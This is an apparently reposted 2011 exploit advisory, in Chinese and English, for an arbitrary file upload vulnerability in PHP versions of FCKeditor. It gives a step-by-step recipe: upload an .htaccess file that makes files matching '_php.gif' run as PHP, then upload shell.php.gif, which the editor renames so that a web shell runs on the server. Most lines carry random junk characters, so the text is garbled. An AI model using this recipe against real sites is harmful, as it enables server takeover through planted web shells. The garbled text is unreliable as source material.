FCKeditor所有php版本Upload上传漏洞) P8 T* ^4 _% a6 S' }
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
: v5 r. d! w( y ? A减小字体 增大字体$ ^+ f/ H5 }& v& Q' ?/ o* v
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability. ~) @! o5 z; O; [
[+] Date: 2011+ e# _- B3 G3 v; P% m+ y- B
[+] Author : sinesafe.cn. G( `% Z8 \7 B
[+] Website : WwW.sinesafe.cn' n2 K: u' o- u- k
———————————————————* y5 A4 c: E. W: b% f6 ^) M
1.create a htaccess file:- A$ h# ~2 k+ n
code:: _, Y4 V; G9 W& O. F, j
<FilesMatch “_php.gif”>. n' m( B' ?( G3 Z# [; B' i
SetHandler application/x-httpd-php
4 l1 d# {! |/ K* l) [% l/ P1 h2 k</FilesMatch>
" B$ h" l/ ]3 A8 |6 C( w6 j1 u% t" t; h& e3 z
2.Now upload this htaccess with FCKeditor.( l8 t/ ]$ J/ q5 S' t8 B. E
1 d& K* n4 x' q: _http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
* a) c: V8 U, |/ j8 s( P3 ]2 k
5 W4 g. S1 v, M: I4 U4 o: U& \$ {http://www.sinesafe.cn/FCKeditor ... onnectors/test.html- j- K" y/ } R# z+ H; k5 w2 z
5 ^" u+ l3 N# o) M———————————————————————————————-) s, \' ?, w; k; I
3.Now upload shell.php.gif with FCKeditor.
& S; v8 {+ S" @/ Z6 C4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.( ]3 p% `4 U# B D; @" M5 |& _
5.http://www.sinesafe.cn/anything/shell_php.gif
2 M3 ^* D1 F5 m; q6.Now shell is available from server. | ! q* e3 F7 o: s/ Z" G" n& u
% _& A& L; |0 H/ W3 k
2 }& J' ~5 C. X, z8 S4 ^# d0 k |